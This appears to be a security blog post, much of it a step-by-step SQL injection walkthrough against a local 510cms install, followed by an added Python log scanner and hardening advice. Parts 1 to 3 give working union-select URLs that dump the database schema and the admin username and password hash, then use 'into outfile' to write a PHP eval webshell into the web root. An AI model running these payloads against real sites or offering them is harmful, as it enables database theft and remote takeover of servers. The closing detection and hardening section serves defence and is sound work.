Part 1: Dumping the database

Dump the database name:

```
http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,SCHEMA_NAME,4 from information_schema.SCHEMATA limit 0,1 --
```

With `limit 1,1` the database `510cms` appears.

Dump the tables:

```
http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,TABLE_NAME,4 from information_schema.TABLES where TABLE_SCHEMA="510cms" --
```

This reveals the table holding the back-end account and password: `510_admin`.

Dump the columns:

```
http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_NAME="510_admin" LIMIT 2,1 --
```

Columns: `name`, `passwd`.

Dump the field values:

```
http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,concat(name,0x3c,passwd),4 from 510_admin --
```

Result: `admin<21232f297a57a5a743894a0e4a801fc3`, i.e. admin/admin.

Part 2: into outfile

```
select * from Table into outfile '/path/filename'
```

Writing a file with `into outfile` requires three conditions to hold:

1. The site's physical path is known (`_SERVER["DOCUMENT_ROOT"]`)
2. `magic_quotes_gpc()=OFF` (check phpinfo.php)
3. Sufficient privileges (the FILE privilege)

Part 3:

1. PHP one-line webshell: `<?php eval($_POST[CMD])?>'`
2. `http://127.0.0.1:800/510cms2/news.php?cid=2&listid=&newsid=2 and 1=2 union select 1,2,3,'<?php eval($_POST[CMD])?>' from 510_admin into outfile 'C:\\wwwroot\\510cms2\\b.php' --`
3. `select * from Table where cid=2 and newsid=2 and 1=2 union select 1,2,3,'<?php eval($_POST[CMD])?>' from 510_admin into outfile 'C:\\wwwroot\\510cms2\\b.php'`
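From the defender's side, every step above leaves a distinctive trace in the web server's access log: `union select` against `information_schema`, an `and 1=2` boolean probe, `into outfile`, and a trailing `--` comment. The following is an added example (not code from the original post or from 510cms) that decodes the query string of each request line and flags those signatures. The log lines are constructed for the example in an Apache-style format, modelled on the payloads shown on this page; the signature names and the `scan_log` / `inspect_target` helpers are assumptions of this example, not part of any real tool.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (not real traffic): one normal request,
# two requests shaped like the payloads in this post, one more normal request.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:12:00:00 +0800] "GET /510cms2/news.php?cid=2-1&listid=&newsid=233 HTTP/1.1" 200 5120
127.0.0.1 - - [10/Oct/2023:12:00:05 +0800] "GET /510cms2/news.php?cid=2-1&listid=&newsid=233%20union%20select%201,2,SCHEMA_NAME,4%20from%20information_schema.SCHEMATA%20limit%200,1%20-- HTTP/1.1" 200 5210
127.0.0.1 - - [10/Oct/2023:12:00:09 +0800] "GET /510cms2/news.php?cid=2&listid=&newsid=2%20and%201=2%20union%20select%201,2,3,%27x%27%20from%20510_admin%20into%20outfile%20%27C:%5C%5Cwwwroot%5C%5C510cms2%5C%5Cb.php%27%20-- HTTP/1.1" 200 4800
127.0.0.1 - - [10/Oct/2023:12:00:12 +0800] "GET /510cms2/news.php?cid=3&listid=&newsid=12 HTTP/1.1" 200 5033
"""

# Extracts the request target from an Apache/nginx style request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures for the injection stages visible in this post. Names are
# this example's own labels (assumed), evaluated in this order.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\s*\.", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("boolean_probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b", re.I)),
    ("sql_comment_tail", re.compile(r"(--|#)\s*$")),
]


def decode_query(target: str) -> str:
    """Return the query string of a request target, percent-decoded.

    Decoding is repeated a few times so that double-encoded payloads
    (%2520 -> %20 -> space) are unwrapped before matching.
    """
    _, _, query = target.partition("?")
    decoded = query
    for _ in range(3):
        prev = decoded
        decoded = unquote_plus(decoded)
        if decoded == prev:
            break
    return decoded


def inspect_target(target: str) -> list:
    """List the signature names that match the decoded query string."""
    query = decode_query(target)
    return [name for name, rx in SIGNATURES if rx.search(query)]


def scan_log(text: str) -> list:
    """Scan log text; return (line number, target, matched signatures)
    for every request that triggers at least one signature."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = inspect_target(m.group("target"))
        if hits:
            findings.append((lineno, m.group("target"), hits))
    return findings


if __name__ == "__main__":
    for lineno, target, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
        print(f"  {decode_query(target)}")
```

Run against the constructed sample, only lines 2 and 3 are flagged; the second of them matches all of `union_select`, `into_outfile`, `boolean_probe` and `sql_comment_tail`, which is the combination that corresponds to the file-write stage in Part 3 and deserves the highest priority. On the hardening side, the three conditions listed in Part 2 are exactly the knobs to close: the application's database account should not hold the FILE privilege, `secure_file_priv` should restrict or disable server-side file writes, and the `newsid` parameter should reach MySQL only through a parameterized query so that the `union select` never becomes part of the statement.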